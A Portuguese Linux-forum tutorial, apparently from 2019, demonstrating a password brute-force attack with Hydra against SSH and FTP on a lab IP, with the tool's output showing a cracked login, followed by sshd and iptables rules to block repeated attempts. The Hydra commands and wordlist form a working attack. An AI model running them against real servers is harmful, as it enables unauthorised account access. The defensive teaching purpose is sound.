Enviado em 24/04/2019 - 10:46h
Os ataques com força bruta (bruteforce) estão entre as formas mais antigas de hacking, além de serem simples de se implementar, mesmo com pouco conhecimento técnico. Esse tipo de ataque, consiste em multiplas tentativas de login em servidores, usando uma lista de possíveis usuários e senhas, até que se tenha sucesso na autenticação. Uma das formas de prevenção para esse tipo de ataque, está em proibir usuários que tentarem o acesso mais de X vezes por minuto.https://thehacktoday.com/password-cracking-dictionarys-download-for-free/
https://wiki.skullsecurity.org/Passwords
# apt -y install hydra
$ nano wordlist.txt
password
P@ssw0rd
toor
12345678
$ hydra -l diego -P wordlist.txt 192.168.15.205 ssh
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-04-24 10:25:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 4 tasks per 1 server, overall 64 tasks, 4 login tries (l:1/p:4), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.15.205 login: diego password: toor
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-04-24 10:26:09
[22][ssh] host: 192.168.15.205 login: diego password: toor
1 of 1 target successfully completed, 1 valid password found
$ hydra -l root -P wordlist.txt 192.168.15.205 ssh
$ hydra -l diego -P wordlist.txt 192.168.15.205 ftp
# nano /etc/ssh/sshd_config
# /etc/init.d/ssh restart
# iptables -A INPUT -i lo -j ACCEPT
# iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# iptables -A INPUT -p tcp -m multiport --dports 21,22,110,143 -m recent --update --seconds 3600 --name BANNED --rsource -j DROP
# iptables-save > /etc/iptables/rules.v4
# service iptables restart
https://www.drsolutions.com.br
Atenção a quem posta conteúdo de dicas, scripts e tal (6)
Como Configurar um Túnel SSH Reverso para Acessar Sua Máquina Local a Partir de uma Máquina Remota
Configuração para desligamento automatizado de Computadores em um Ambiente Comercial
O mínimo que você precisa saber sobre o terminal (parte 2)
O mínimo que você precisa saber sobre o terminal (parte 1)
Como iniciar uma máquina virtual do VirtualBox automaticamente no boot do LUbuntu 18 LTS
Mudar o gerenciador de login (GDM para SDDM e vice-versa) - parte 2
Como deixar as abas do Firefox mais fininhas
Mudar o gerenciador de login (GDM para SDDM)
"Tentando" fazer com que programas rodem no Wayland e no X11
O que você está ouvindo agora? [2] (164)
Como baixar os drivers de áudio no linux mint? (6)
Erro ao iniciar Ubuntu 24.04.1 LTS - Management Owner Key - MoK (6)
[Python] Automação de scan de vulnerabilidades
[Python] Script para analise de superficie de ataque
[Shell Script] Novo script para redimensionar, rotacionar, converter e espelhar arquivos de imagem
[Shell Script] Iniciador de DOOM (DSDA-DOOM, Doom Retro ou Woof!)
[Shell Script] Script para adicionar bordas às imagens de uma pasta